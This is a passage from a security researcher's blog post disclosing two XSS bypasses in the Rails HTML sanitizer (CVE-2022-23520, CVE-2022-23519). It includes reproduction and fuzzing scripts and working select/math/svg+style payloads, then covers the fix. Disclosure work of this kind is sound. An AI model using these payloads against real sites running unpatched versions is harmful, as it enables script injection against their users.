        <span style="color:#66d9ef">if</span> <span style="color:#f92672">!</span>loofah_using_html5? <span style="color:#f92672">&amp;&amp;</span> tags<span style="color:#f92672">.</span>include?(<span style="color:#e6db74">&#34;select&#34;</span>) <span style="color:#f92672">&amp;&amp;</span> tags<span style="color:#f92672">.</span>include?(<span style="color:#e6db74">&#34;style&#34;</span>)
          warn(<span style="color:#e6db74">&#34;WARNING: </span><span style="color:#e6db74">#{</span>self<span style="color:#f92672">.</span>class<span style="color:#e6db74">}</span><span style="color:#e6db74">: removing &#39;style&#39; from safelist, should not be combined with &#39;select&#39;&#34;</span>)
          tags<span style="color:#f92672">.</span>delete(<span style="color:#e6db74">&#34;style&#34;</span>)
        <span style="color:#66d9ef">end</span>
        tags
      <span style="color:#66d9ef">end</span>

      <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">allowed_tags</span>(options)
        <span style="color:#66d9ef">if</span> options<span style="color:#f92672">[</span><span style="color:#e6db74">:tags</span><span style="color:#f92672">]</span>
          remove_safelist_tag_combinations(options<span style="color:#f92672">[</span><span style="color:#e6db74">:tags</span><span style="color:#f92672">]</span>)
        <span style="color:#66d9ef">else</span>
          self<span style="color:#f92672">.</span>class<span style="color:#f92672">.</span>allowed_tags
        <span style="color:#66d9ef">end</span>
      <span style="color:#66d9ef">end</span>

      <span style="color:#f92672">...</span>
    <span style="color:#66d9ef">end</span>
  <span style="color:#66d9ef">end</span>
<span style="color:#66d9ef">end</span>
</code></pre></div><p>You may have noticed that the method <code>remove_safelist_tag_combinations</code> is applied to the allowed tags only
if they are passed within the <code>options</code>. If no tags are in the options, <code>allowed_tags</code> falls back to the
class variable <code>Rails::Html::SafeListSanitizer.allowed_tags</code>, which contains a default value with a few
harmless tags (<a href="https://github.com/rails/rails-html-sanitizer/blob/f83f08c81a3a33ce0fb1c379933c416ae80672fa/lib/rails/html/sanitizer.rb#L108">source code</a>).
So far so good. All of this looks solid at first sight.</p>
<p>When building an application in Rails, you don&rsquo;t use the Gem explicitly.
Rather, it is part of the framework and &ldquo;just there&rdquo;.
The documentation of Rails tells you how to use it <a href="https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html">here</a>.
In the docs you find different ways in which you can pass custom allowed tag lists.
One is to use the Rails <code>config/application.rb</code> and set something like <code>config.action_view.sanitized_allowed_tags = [&quot;select&quot;, &quot;style&quot;]</code>.
The allow list will then be applied globally in your application.
Another is to pass it explicitly as an option when calling the sanitizer, e.g., in your ERB templates.
It could look like this: <code>&lt;p&gt;Hello &lt;%= sanitize @name, tags: [&quot;select&quot;, &quot;style&quot;] %&gt;&lt;/p&gt;</code>.
In this case, the allow list will be specific to this call.</p>
<p>When I updated my application and the fix did not work, I used the first of the ways shown above,
i.e., setting an allow list in <code>config/application.rb</code>.
It turned out that the way this setting works is that it overwrites the class variable
<code>Rails::Html::SafeListSanitizer.allowed_tags</code>, which I think is exposed
<a href="https://github.com/rails/rails/blob/55e143a398247387d734386716016928fca841a4/actionview/lib/action_view/helpers/sanitize_helper.rb#L131">here</a>
in the ActionView helpers.
As we saw above, the new method <code>remove_safelist_tag_combinations</code>
does not apply to that list (since it was mistakenly assumed to be constant?).
This means the fix does not work when setting allowed tags via config.</p>
<p>You can convince yourself of the behaviour with this simple script
which I&rsquo;ve named <code>sanitize-1-4-3.rb</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#75715e">#! /usr/bin/env ruby</span>

require <span style="color:#e6db74">&#34;bundler/inline&#34;</span>
require <span style="color:#e6db74">&#39;bundler&#39;</span>

<span style="color:#66d9ef">Bundler</span><span style="color:#f92672">.</span>configure_gem_home_and_path <span style="color:#e6db74">&#34;.cache/bundler&#34;</span>

gemfile <span style="color:#66d9ef">do</span>
  source <span style="color:#e6db74">&#34;https://rubygems.org&#34;</span>
  gem <span style="color:#e6db74">&#34;rails-html-sanitizer&#34;</span>, <span style="color:#e6db74">&#34;=1.4.3&#34;</span>
<span style="color:#66d9ef">end</span>

require <span style="color:#e6db74">&#34;rails-html-sanitizer&#34;</span>

<span style="color:#66d9ef">if</span> <span style="color:#66d9ef">ARGV</span><span style="color:#f92672">.</span>length <span style="color:#f92672">!=</span> <span style="color:#ae81ff">2</span>
  puts <span style="color:#e6db74">&#34;Pass 2 arguments:&#34;</span>
  puts <span style="color:#e6db74">&#34; 1st the string to sanitize&#34;</span>
  puts <span style="color:#e6db74">&#34; 2nd the tags you want to whitelist&#34;</span>
  exit
<span style="color:#66d9ef">end</span>

input <span style="color:#f92672">=</span> <span style="color:#66d9ef">ARGV</span><span style="color:#f92672">[</span><span style="color:#ae81ff">0</span><span style="color:#f92672">]</span>
tags <span style="color:#f92672">=</span> <span style="color:#66d9ef">ARGV</span><span style="color:#f92672">[</span><span style="color:#ae81ff">1</span><span style="color:#f92672">].</span>split(<span style="color:#e6db74">&#39; &#39;</span>)

puts <span style="color:#e6db74">&#34;Current Version         : &#34;</span> <span style="color:#f92672">+</span> <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Sanitizer</span><span style="color:#f92672">::</span><span style="color:#66d9ef">VERSION</span>
puts <span style="color:#e6db74">&#34;Input string            : &#34;</span> <span style="color:#f92672">+</span> input
puts <span style="color:#e6db74">&#34;Allowed tags            : &#34;</span> <span style="color:#f92672">+</span> tags<span style="color:#f92672">.</span>join(<span style="color:#e6db74">&#39; &#39;</span>)

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">sanitize_argument</span>(input, tags)
  <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">SafeListSanitizer</span><span style="color:#f92672">.</span>new<span style="color:#f92672">.</span>sanitize(input, <span style="color:#e6db74">tags</span>: tags)
<span style="color:#66d9ef">end</span>

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">sanitize_class_varible</span>(input, tags)
  <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">SafeListSanitizer</span><span style="color:#f92672">.</span>allowed_tags <span style="color:#f92672">=</span> tags
  output <span style="color:#f92672">=</span> <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">SafeListSanitizer</span><span style="color:#f92672">.</span>new<span style="color:#f92672">.</span>sanitize(input)
  <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">SafeListSanitizer</span><span style="color:#f92672">.</span>allowed_tags <span style="color:#f92672">=</span> <span style="color:#66d9ef">nil</span>

  output
<span style="color:#66d9ef">end</span>

puts <span style="color:#e6db74">&#34;Output (class variable) : &#34;</span> <span style="color:#f92672">+</span> sanitize_class_varible(input, tags)
puts <span style="color:#e6db74">&#34;Output (argument)       : &#34;</span> <span style="color:#f92672">+</span> sanitize_argument(input, tags)
</code></pre></div><p>Run it and you get an output as shown below.
As you can see, the string is properly sanitized when passing the allow list in the options
but not sanitized when the class variable is overwritten:</p>
<pre tabindex="0"><code>user@notebook:~$ ./sanitize-1-4-3.rb '&lt;select&gt;&lt;style&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/style&gt;&lt;/select&gt;' 'select style'
Current Version         : 1.4.3
Input string            : &lt;select&gt;&lt;style&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/style&gt;&lt;/select&gt;
Allowed tags            : select style
Output (class variable) : &lt;select&gt;&lt;style&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/style&gt;&lt;/select&gt;
WARNING: Rails::Html::SafeListSanitizer: removing 'style' from safelist, should not be combined with 'select'
Output (argument)       : &lt;select&gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/select&gt;
</code></pre><p>This was reported at HackerOne <a href="https://hackerone.com/reports/1654310">here</a>
and disclosed as <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-23520">CVE-2022-23520</a>
and <a href="https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-rrfc-7g8p-99q8">GHSA-rrfc-7g8p-99q8</a>.</p>
<h2 id="cve-2022-23519-more-xss-for-mathstyle-and-svgstyle">CVE-2022-23519: More XSS for math+style and svg+style</h2>
<p>A reader with an eye for details may have noticed something strange about the fix.
The method <code>remove_safelist_tag_combinations</code> removes <code>style</code> from the allow list
only if three conditions are met:</p>
<ul>
<li><code>style</code> is in the list: makes perfect sense, remove <code>style</code> only if it is there</li>
<li><code>select</code> is in the list: also makes sense, the combination was the problem</li>
<li><code>!loofah_using_html5?</code>: this reads like &ldquo;only if we are not using an HTML5 parser&rdquo;</li>
</ul>
<p>The third condition raises some suspicion.
Could it be that the Rails sanitizer does not use an HTML5-compliant parser?
If the parser of the sanitizer is different from the parser of your browser,
then there could be a lot more problems than just the <code>select</code> and <code>style</code> tag combination.</p>
<p>To test, I wrote a small fuzzing script named <code>fuzz-1-4-3.rb</code> that would test a few hand-picked XSS payloads
wrapped into all possible combinations of two HTML tags against the sanitizer.
It looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-ruby" data-lang="ruby"><span style="color:#75715e">#! /usr/bin/env ruby</span>

require <span style="color:#e6db74">&#34;bundler/inline&#34;</span>
require <span style="color:#e6db74">&#39;bundler&#39;</span>

<span style="color:#66d9ef">Bundler</span><span style="color:#f92672">.</span>configure_gem_home_and_path <span style="color:#e6db74">&#34;.cache/bundler&#34;</span>

gemfile <span style="color:#66d9ef">do</span>
  source <span style="color:#e6db74">&#34;https://rubygems.org&#34;</span>
  gem <span style="color:#e6db74">&#34;rails-html-sanitizer&#34;</span>, <span style="color:#e6db74">&#34;=1.4.3&#34;</span>
<span style="color:#66d9ef">end</span>

require <span style="color:#e6db74">&#34;rails-html-sanitizer&#34;</span>


puts <span style="color:#e6db74">&#34;[+] Current Version : &#34;</span> <span style="color:#f92672">+</span> <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Sanitizer</span><span style="color:#f92672">::</span><span style="color:#66d9ef">VERSION</span>


<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">render</span>(i, sanitized, wrapped_payload)
  html <span style="color:#f92672">=</span> <span style="color:#e6db74">&lt;&lt;-EOF
</span><span style="color:#e6db74"></span><span style="color:#f92672">&lt;</span>html<span style="color:#f92672">&gt;</span>
  <span style="color:#f92672">&lt;</span>head<span style="color:#f92672">&gt;</span>
    <span style="color:#f92672">&lt;</span>script<span style="color:#f92672">&gt;</span>
      function <span style="color:#66d9ef">next</span>() {
        window<span style="color:#f92672">.</span>location <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file:///tmp/www/file</span><span style="color:#e6db74">#{</span>i<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span><span style="color:#e6db74">}</span><span style="color:#e6db74">.html&#34;</span>;
      }
    <span style="color:#f92672">&lt;</span><span style="color:#e6db74">/script&gt;
</span><span style="color:#e6db74">  &lt;/</span>head<span style="color:#f92672">&gt;</span>
  <span style="color:#f92672">&lt;</span>body onload<span style="color:#f92672">=</span><span style="color:#66d9ef">next</span>()<span style="color:#f92672">&gt;</span>
    <span style="color:#75715e">#{CGI::escapeHTML(wrapped_payload)}</span>
    <span style="color:#75715e">#{sanitized}</span>
  <span style="color:#f92672">&lt;</span><span style="color:#e6db74">/body&gt;
</span><span style="color:#e6db74">&lt;/</span>html<span style="color:#f92672">&gt;</span>
  <span style="color:#66d9ef">EOF</span>

  <span style="color:#66d9ef">File</span><span style="color:#f92672">.</span>write(<span style="color:#e6db74">&#34;/tmp/www/file</span><span style="color:#e6db74">#{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">.html&#34;</span>, html)

  sanitized
<span style="color:#66d9ef">end</span>


<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">wrap</span>(tag1, tag2, payload)
  <span style="color:#e6db74">&#34;&lt;</span><span style="color:#e6db74">#{</span>tag1<span style="color:#e6db74">}</span><span style="color:#e6db74">&gt;&lt;</span><span style="color:#e6db74">#{</span>tag2<span style="color:#e6db74">}</span><span style="color:#e6db74">&gt;</span><span style="color:#e6db74">#{</span>payload<span style="color:#e6db74">}</span><span style="color:#e6db74">&lt;/</span><span style="color:#e6db74">#{</span>tag1<span style="color:#e6db74">}</span><span style="color:#e6db74">&gt;&lt;/</span><span style="color:#e6db74">#{</span>tag2<span style="color:#e6db74">}</span><span style="color:#e6db74">&gt;&#34;</span>
<span style="color:#66d9ef">end</span>

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">sanitize</span>(tag1, tag2, s)
  <span style="color:#66d9ef">Rails</span><span style="color:#f92672">::</span><span style="color:#66d9ef">Html</span><span style="color:#f92672">::</span><span style="color:#66d9ef">SafeListSanitizer</span><span style="color:#f92672">.</span>new<span style="color:#f92672">.</span>sanitize s, <span style="color:#e6db74">tags</span>: <span style="color:#f92672">[</span>tag1, tag2<span style="color:#f92672">]</span>
<span style="color:#66d9ef">end</span>


html_tags <span style="color:#f92672">=</span> <span style="color:#66d9ef">File</span><span style="color:#f92672">.</span>readlines(<span style="color:#e6db74">&#34;html-tags.txt&#34;</span>, chomp: <span style="color:#66d9ef">true</span>)
payloads <span style="color:#f92672">=</span> {
  <span style="color:#e6db74">&#34;&lt;script&gt;alert()&lt;/script&gt;&#34;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#f92672">[</span><span style="color:#e6db74">&#34;&lt;script&gt;&#34;</span><span style="color:#f92672">]</span>,
  <span style="color:#e6db74">&#34;&lt;img src=x onerror=alert()&gt;&#34;</span> <span style="color:#f92672">=&gt;</span> <span style="color:#f92672">[</span><span style="color:#e6db74">&#34;onerror&#34;</span>, <span style="color:#e6db74">&#34;alert&#34;</span><span style="color:#f92672">]</span>,
}
i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>


puts <span style="color:#e6db74">&#34;[+] Generating test files...&#34;</span>
html_tags<span style="color:#f92672">.</span>each <span style="color:#66d9ef">do</span> <span style="color:#f92672">|</span>tag1<span style="color:#f92672">|</span>
  html_tags<span style="color:#f92672">.</span>each <span style="color:#66d9ef">do</span> <span style="color:#f92672">|</span>tag2<span style="color:#f92672">|</span>
    payloads<span style="color:#f92672">.</span>each <span style="color:#66d9ef">do</span> <span style="color:#f92672">|</span>payload, indicators<span style="color:#f92672">|</span>

      wrapped_payload <span style="color:#f92672">=</span> wrap(tag1, tag2, payload)
      sanitized <span style="color:#f92672">=</span> sanitize(tag1, tag2, wrapped_payload)
      <span style="color:#66d9ef">if</span> indicators<span style="color:#f92672">.</span>all? { <span style="color:#f92672">|</span>indicator<span style="color:#f92672">|</span> sanitized<span style="color:#f92672">.</span>include? indicator }
        render(i, sanitized, wrapped_payload)
        puts <span style="color:#e6db74">&#34;- Rendered </span><span style="color:#e6db74">#{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74"> (allowed tags [</span><span style="color:#e6db74">#{</span>tag1<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span><span style="color:#e6db74">#{</span>tag2<span style="color:#e6db74">}</span><span style="color:#e6db74">]): </span><span style="color:#e6db74">#{</span>sanitized<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
        i <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span>
      <span style="color:#66d9ef">end</span>

    <span style="color:#66d9ef">end</span>
  <span style="color:#66d9ef">end</span>
<span style="color:#66d9ef">end</span>
</code></pre></div><p>A few explanations.
The function <code>render</code> writes numbered HTML test files into <code>/tmp/www/</code> (numbering should be consecutive, starting at 0).
You pass <code>sanitized</code>, which is the previously sanitized string that is embedded in the HTML body.
You also pass <code>wrapped_payload</code>, which is rendered to the HTML body in HTML-escaped form (just so you can later see what the payload was).
The HTML header contains a script which changes the location to the next test file once the body finished loading
(e.g., it navigates to <code>/tmp/www/file1.html</code> if the current file is <code>/tmp/www.file0.html</code>).
The idea is that the browser will later navigate from file to file, either until it reaches the end
or until one of the sanitized XSS payloads will <code>alert()</code>, which stops the process.</p>
<p>The next functions are <code>wrap</code>, which wraps a <code>payload</code> into two tags <code>tag1</code> and <code>tag2</code>
and <code>sanitize</code>, which applies sanitization on a string while allowing <code>tag1</code> and <code>tag2</code>.</p>
<p>The script also relies on a file <code>html-tags.txt</code> from which it reads the wordlist of HTML tags.
Mine was compiled from various places and had 136 entries.
Find it <a href="../../files/36/html-tags.txt">here</a>.</p>
<p>Finally, I&rsquo;ve defined a Ruby hash called <code>payloads</code> with two simple XSS payloads,
each accompanied with a list of strings I call indicators.
The idea of that is to only render test files when the indicator strings are present
to avoid rendering files that are unlikely to execute the payload.</p>
<p>Finally, at the bottom of the script, nested loops run through the list of tags and payloads,
sanitize the wrapped payload and render the test file if all indicators are present.
Note that I pass the allow list as an option to <code>sanitize</code> to avoid getting hits for
the known combination of <code>select</code> and <code>style</code>.</p>
<p>Ensure <code>html-tags.txt</code> exists in the current directory, <code>/tmp/www/</code> exists and is empty, and then run the script with <code>./fuzz-1-4-3.rb</code>
to generate 536 test files.
Then open a browser.
I&rsquo;ve used <code>chromium --disable-ipc-flooding-protection</code>.
Without the argument it may stop navigating to the next file after a while.</p>
<p>In the browser, navigate to <code>file:///tmp/www/file0.html</code> now, then watch.
After a short while, you should see for &ldquo;file163.html&rdquo;, which contains
the wrapped payload <code>&lt;math&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/math&gt;&lt;/style&gt;&lt;/math&gt;</code>:</p>











<figure>
  
    
      <img class="lazyload" data-src="/img/36_a_tale_of_two_xss_in_rails_html_sanitizer/xss_payload_worked.png"  />
    
  
  
  <figcaption>
    <header><b>XSS payload in file163.html executed</b></header>
    
  </figcaption>
  
</figure>
<style media="screen">
  .blur-up {
    -webkit-filter: blur(5px);
    filter: blur(5px);
    transition: filter 400ms, -webkit-filter 400ms;
  }
  .blur-up.lazyloaded {
    -webkit-filter: blur(0);
    filter: blur(0);
  }
</style>

<p>Keep going and you will get two more hits for &ldquo;file498.html&rdquo; and &ldquo;file499.html&rdquo;.
In the end, all of them are due to the following two combinations of tags, which allow
for XSS just like the combination <code>select</code> and <code>style</code> did:</p>
<ul>
<li><code>math</code> and <code>style</code>: works for a payload like <code>&lt;math&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/math&gt;&lt;/style&gt;&lt;/math&gt;</code>,
which the sanitizer will not change</li>
<li><code>svg</code> and <code>style</code>: works for both payloads <code>&lt;svg&gt;&lt;style&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;/svg&gt;&lt;/style&gt;&lt;/svg&gt;</code>
and <code>&lt;svg&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/svg&gt;&lt;/style&gt;&lt;/svg&gt;</code></li>
</ul>
<p>This was reported at HackerOne <a href="https://hackerone.com/reports/1656627">here</a>
and disclosed as <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-23519">CVE-2022-23519</a>
and <a href="https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-9h9g-93gc-623h">GHSA-9h9g-93gc-623h</a>.</p>
<h2 id="the-underlying-problem-and-its-current-fix">The underlying problem and its current fix</h2>
<p>If you really want to know what is going on under the hood then stop reading this and go to these
<a href="https://github.com/flavorjones/loofah/blob/main/docs/2022-10-decision-on-cdata-nodes.md#whats-happening-in-these-cves">decision notes</a>
instead.
You will find a very extensive and detailed analysis of these and other related CVEs there
(note that the repository is <a href="https://github.com/flavorjones/loofah">github.com/flavorjones/loofah</a>,
which is the actual implementation of the Rails HTML sanitizer).</p>
<p>The short summary of this analysis: the problem is indeed the use of an HTML4 parser.
An HTML4 DOM seems to treat the contents of the <code>style</code> tags as <code>CDATA</code> which needs no escaping or sanitization.
In an HTML5 DOM however everything inside <code>math</code> and <code>svg</code> tags is &ldquo;foreign content&rdquo; and special parsing rules apply.
For example, for the case of <code>&lt;math&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/math&gt;&lt;/style&gt;&lt;/math&gt;</code>,
an HTML5 parser seems to treat the <code>img</code> tag within <code>math</code> and <code>style</code> as an error and repairs the DOM for you by moving it out
(as described <a href="https://github.com/flavorjones/loofah/blob/main/docs/2022-10-decision-on-cdata-nodes.md#the-math-case">here</a>).</p>
<p>The fix this time appears to be <a href="https://github.com/flavorjones/loofah/commit/d6941ad5ed7b73d7eb8d540f47875070017c7ab4">this commit</a>,
which is an implementation of solution two presented in the <a href="https://github.com/flavorjones/loofah/blob/main/docs/2022-10-decision-on-cdata-nodes.md">decision notes</a>.
Effectively it now escapes everything the HTML4 parser parses as CDATA.</p>
<p>You can convince yourself by building a test script as those shown above, but for version <code>1.4.4</code> of the Gem.
Run it and you see that the characters <code>&lt;</code>, <code>&gt;</code> and <code>&amp;</code> are escaped now:</p>
<pre tabindex="0"><code>user@notebook:~$ ./sanitize-1-4-4.rb '&lt;math&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/math&gt;&lt;/style&gt;&lt;/math&gt;' 'math style'
Current Version  : 1.4.4
Input string     : &lt;math&gt;&lt;style&gt;&lt;img src=x onerror=alert()&gt;&lt;/math&gt;&lt;/style&gt;&lt;/math&gt;
Allowed tags     : math style
Output           : &lt;math&gt;&lt;style&gt;&amp;lt;img src=x onerror=alert()&amp;gt;&amp;lt;/math&amp;gt;&lt;/style&gt;&lt;/math&gt;
</code></pre><p>Moreover, if you re-run the fuzzing script with the Gem version bumped to <code>1.4.4</code>,
you still get a 269 test files but none of them hit anymore.
Thus, it looks to me as if this particular issue is finally gone.</p>

    </div>
    
    <footer>
      <hr>
      <p>
  Published
  
    
      by <span itemprop="author">Dominic Breuker</span>
    
  
  <time itemprop="datePublished" datetime="2022-12-20T00:00:00&#43;00:00">
    20 Dec, 2022
  </time>
  
    in <span itemprop="articleSection"><a href="/categories/cve/">CVE</a> and <a href="/categories/web/">web</a></span>
  
  
    and tagged <a href="/tags/cve/">CVE</a>, <a href="/tags/cve-2022-23519/">CVE-2022-23519</a>, <a href="/tags/cve-2022-23520/">CVE-2022-23520</a>, <a href="/tags/rails/">Rails</a> and <a href="/tags/xss/">XSS</a>
  
  using <span itemprop="wordCount">2355</span> words.
</p>

      



    </footer>
  </article>
</main>
    <footer>
  

</footer>
  </body>
</html>
